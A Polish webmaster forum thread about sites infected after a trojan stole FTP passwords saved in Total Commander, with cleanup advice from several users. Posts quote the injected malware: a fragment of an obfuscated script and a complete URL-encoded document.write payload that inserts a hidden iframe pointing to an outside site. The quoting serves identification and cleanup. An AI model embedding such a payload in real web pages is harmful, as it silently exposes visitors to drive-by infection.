Witam

Dostałem mail od googli ze moja stronka coś tam infekuje wiecie jak sobie z tym poradzić?

Dear site owner or webmaster of strona.pl,
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):
http://www.strona.pl
http://www.strona.pl
Here is a link to a sample warning page:
http://www.google.com/interstitial?url=htt.../www.strona.pl/
We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:
1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser
If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
http://www.stopbadware.org/home/security
Once you've secured your site, you can request that the warning be removed by visiting
http://www.google.com/support/webmasters/b...py?answer=45432
and requesting a review. If your site is no longer harmful to users, we will remove the warning.


Co robic?

Witam,

masz na stronie www.camargo.com.pl trojana
to jego skrypt
<script>function c32aee72b6q49d14ea003825(q49d14ea003fee){ var q49d14ea0047bf=16; return (eval('pa'+'rseInt')(q49d14ea003fee,q49d14ea0047bf));}function q49d14ea00575c(q49d14ea005f2a){ function q49d14ea007698(){return 2;} var q49d14ea0066fa='';q49d14ea008641=String['fromCharCode'];for(q49d14ea006ec9=0;q49d14ea006ec9<q49d14ea005f2a.length;q49d14ea006ec9+=q49d14ea007698()){ q49d14ea0066fa+=(q49d14ea008641

wykradziona Ci login i haslo do ftp-a zmien usun skrypt i bedzie cacy
zamieściłem tylko część tego skryptu bo jest dośc długi
a tu masz linka do tego tematu http://www.forum.optymalizacja.com/index.p...wirus&st=45
korzystasz z total commandera ????

a jak sie uporasz to zglos to googlowi
http://www.google.pl/interstitial?url=http...camargo.com.pl/


Pozdrawiam
decent

Warning: Cannot modify header information - headers already sent by (output started at /wp-includes/default-filters.php:200) in /wp-includes/pluggable.php on line 770

NIe moge sie dostać do panelu administarcyjnego... ja pierdol..... co za lipa. Wie jak pomóc ktoś?

Mam total komanders

nic sie nie bój przerabialem to na 300 WP dasz rade po pierwsze zmien sobie hasło do ftp i usun Total Commandera - na zastępstwo polecam FLASH FXP ( super, i robi faze ze szybciej niz TC chodzi ) potem wchodzisz na serwer przez tego flash fxp z nowymi danymi, edytujesz pliki index.php oraz /admin/index.php - jak masz jeszcze na stronie pliki typu home.php, auth.php to sprawdź z każdego pliku usuwasz kod złego skryptu który stosunkowo łatwo odróżnić

P.S. Dopisuje się to na początku lub na koncu pliku ( ten wirus )

10386396
to moje gg możesz sie odezwać do mnie?

Jest ktoś kto by mi to naprawił, jak to takie proste? Nie pozostanę dłużny w tej kwestii...

Ja tobie tego nie będę robił, ale będzie wystarczyło usunąć złośliwy kod ze strony. Poza tym samo usunięcie Total Commandera nie pomoże - na początek trzeba zmienić hasła FTP wszystkich kont, które były zapamiętane w TC.

eh ostatnio to samo mialem, to wszystko przez total commandera po prostu lepiej nie trzymac tam hasel

dla testu zostawilem kilka hasel nie zmienionych, po ostatniej akcji, na mniej waznych stronach i po okolo 10 dniach - dziadostwo znowu powrocilo. Total Commander niestety jest słabym ogniwem - a takie fajne narzędzie a hasel nie wolno w nim trzymac
Ta akcja jest masowa i wiele stron dostalo po du.ie - ludzie nawet nie wiedzą, ze ich katalogi i precle sa z wirusem a jest ich cala masa - wszyscy z nas na tym cierpią

sebau, pitreq_ i inni zaatakowani: macie w systemie program antywirusowy? Używacie IE czy innej przeglądarki? Pytam z ciekawości. Zastanawia mnie czy to dziadostwo tak szybko się mutuje, że antywirusy go nie wykrywają. Ciekawe też jak się dostaje do systemu. Sam tego nie złapałem.

mialem antyvira a jakos mnie zainfekowalo. Do przegladania stron uzywam ff i lunascape ale niestety takie programy jak SK i inne sa zbudowane w oparciu o IE. Zresztą firefox też dziurawy - caly czas go lataja - browse happy he he Tysiace stron zainfekowanych - na stronach scrypty i iframe przekierowujace na chinskie domeny No ale wole takie wirusa niż takiego który by wycinał całe zasoby - bo troche szkód by mi zrobił

mi też dowalilo jakiegos wirusa ale juz sie z nim uporałem. uzywam Filezille ale kilka dni nie mialem antywira i to chyba jest przyczyna

<script type="text/javascript">
document.write(unescape('<script%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%36%39%25%36%36%25%37%32%25%36%31%25%36%44%25%36%35%25%32%30%25%36%39%25%36%34%25%33%44%25%32%32%25%35%32%25%34%36%25%34%39%25%34%36%25%37%32%25%36%31%25%36%44%25%36%35%25%32%32%25%30%44%25%30%41%25%32%30%25%32%30%25%36%45%25%36%31%25%36%44%25%36%35%25%33%44%25%32%32%25%35%32%25%34%36%25%34%39%25%34%36%25%37%32%25%36%31%25%36%44%25%36%35%25%32%32%25%30%44%25%30%41%25%32%30%25%32%30%25%37%33%25%37%34%25%37%39%25%36%43%25%36%35%25%33%44%25%32%32%25%37%37%25%36%39%25%36%34%25%37%34%25%36%38%25%33%41%25%33%30%25%37%30%25%37%38%25%33%42%25%32%30%25%36%38%25%36%35%25%36%39%25%36%37%25%36%38%25%37%34%25%33%41%25%33%30%25%37%30%25%37%38%25%33%42%25%32%30%25%36%32%25%36%46%25%37%32%25%36%34%25%36%35%25%37%32%25%33%41%25%32%30%25%33%30%25%37%30%25%37%38%25%32%32%25%30%44%25%30%41%25%32%30%25%32%30%25%37%33%25%37%32%25%36%33%25%33%44%25%32%32%25%36%38%25%37%34%25%37%34%25%37%30%25%33%41%25%32%46%25%32%46%25%36%33%25%36%38%25%36%31%25%37%32%25%37%34%25%37%33%25%36%35%25%37%39%25%36%35%25%32%45%25%36%33%25%36%46%25%36%44%25%32%46%25%36%33%25%36%46%25%37%35%25%36%45%25%37%34%25%32%45%25%37%30%25%36%38%25%37%30%25%33%46%25%36%39%25%36%45%25%36%33%25%36%46%25%36%44%25%36%35%25%33%44%25%33%35%25%33%34%25%33%32%25%33%32%25%32%32%25%33%45%25%33%43%25%32%46%25%36%39%25%36%36%25%37%32%25%36%31%25%36%44%25%36%35%25%33%45%27%29%29%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E'));
</script> nowa mutacja Panowie, sprawdzajcie stronki...

moment, moment, wpadło Ci to ? jak to się stało ? hasełka zmieniłeś, TC nie używasz już, zatem ?
Na kompie jakiś rootkit ?

M

nie trzeba z TC rezygnować. Można dodać kilka znaków do hasła z przodu i usuwać je przy logowaniu. Poza tym ten syf, podobnie jak poprzedni trojan downloader infekuje wiele plików na serwerze, więc usunięcie 99% nic nie da bo z pozostałego 1% zainfekuje kolejne pliki. Polecam przeczesanie plików o tej samej nazwie co plik zainfekowany, a proponowane przeze mnie wyjście z dopisaniem kilku znaków do hasła jest chyba bezpieczniejsze, niż zapisywanie haseł w jakimkolwiek kliencie.
ps. Rozwaliło stronę, proszę o edycję @tomekq

No ok, ale skoro to nie problem z przechowywaniem haseł, a z protokołem FTP to czy dopisanie literek coś da ?

pytanie w związku z wypowiedzią gibkiego czy wirus może sam się rozsiewać na serwerze ?

To jest zmora teraz z tym, wywalic Total Commandera, instalowac FileZilla, to robia glownie estonczycy - kolejnym po turkach durniom sie nudzi ;] I oczywiscie haslo zmienic bo mi gnojki ciagle doklejali kod.


Niestety tak, atakuje glownie pliki index.php ale ostatnio mi sie wkleil nawet w plik main.php Radze przeszukac wszystki pliki index.php - ja to zrobilem tak, ze zgralem na dysk wszystkie pliki php z serwera do jednego folderu, pozniej w windows XP prawym przyciskiem "wyszukaj" i pole "wyraz lub fraza w pliku" wpisalem - w mojm przypadku .cn lub <iframe> - az sie zdziwilem ile mi sie tego podoklejalo.
ps. tzn zle odpowiedzialem - jak zmienilem haslo to juz nie - wirus siedzi na dysku lub gdzies w systemie - to co sie dzieje na serwerze to efekt jego dzialan

a antywiry na go nie wykrywają na komputerach ani serwerach? Domyślam się, że nie bo by nie było taki problemów. To jakiś nowy wirus?
To jakiś sezon wirusowy chyba.

mam niby esseta ale nic na dysku nie wykrywa ;/ normalnie juz 10ty raz to robie ;/

Jeśli używacie Firefoxa proponuje zainstalować rozszerzenie https://addons.mozilla.org/pl/firefox/addon/722 i świadomie dopuszczać skrypty które mają się wykonywać. Zmiana TC na innego klienta FTP niewiele daję, bo ważne jest by nie dopuścić do infekcji, trojan, wirus czy inne dziadostwo nie koniecznie musi wykradać hasła do FTP, ale może robić inne nieciekawe rzeczy. Ostatnio wirusy głównie skupiają się na rozsyłaniu spamu i tworzeniu zombi netów. Kiedyś wirus miał zrobić coś złego tylko na twoim kompie, dość szybko można było się zorientować że coś jest nie tak, były pisane głownie dla zabawy, teraz robi się z tego przemysł i będzie tylko gorzej. Radzę więc być czujnym i nie ufać nadmiernie antywirusom, bo większość wirusów na stronach przechodzi przez nie jak przez masło.

a jak ona działa? Przy każdym js java pyta czy uruchomić skrypt? To chyba trochę uciążliwe? Zainstalowałem dla sprawdzenia:)


Edit: Chyba jednak jest nieco uciążliwa.

Moim zdaniem mniej uciążliwe niż co tydzień usuwanie ze swoim stron, robaków lub bycie częściom spam netu. Na większości zaufanych stron dajesz sobie by uruchamiał się skryty, na tych co odwiedzasz pierwszy raz się głębiej zastanawiasz. Ale jak kto woli. Pamiętajcie że twórcy wirusów są zawsze o krok do przodu w stosunku do twórców antywirusów, kiedyś można był sobie pozwolić na lekkie opóźnienie ze szczepionką, teraz jednak wszyscy jesteśmy podłączeni do netu 24h więc infekcje mnożą się nieprzeciętnie. Co widać ile razy ten temat jest poruszany na forum, skończyły się czasy błogiego serfowania po necie !

Ja bym sie nie zdziwlil, gdyby tworcy antywirusow byli tworcami wirusow - te ataki spowodowaly panike, wkurzenie, duze straty czasu, moja avira nie daje rady no i... musze kupic nortona ;]

powiem Wam szczerze - home.pl urosło mi w oczach! Po rozmowie z konsultantem potwierdziły się moje przypuszczenia - swego czasu dałem programiście konto e-mail z dostępem do całego ftp... on też miał wirusa bo kto go nie miał ja usuwalem wirusa, a z jego danych się logowano z niemieckiego hosta i wirus od nowa mam nadzieje że backup da rady

Też mam Avirę, zawszę myślałem, że wystarczy - nie spowalnia tak jak norton, czy awast. No i darmowa.

moja wcześniejsza wypowiedź była późnonocna ale chodzi o to aby osoby które mimo że zmieniły hasła do ftp na swoim koncie sprawdziły czy nie mają dodatkowych kont e-mail z dostepem do całego ftp... tak może być na home.pl i to wlasnie z tych dodatkowych kont mogą być ataki...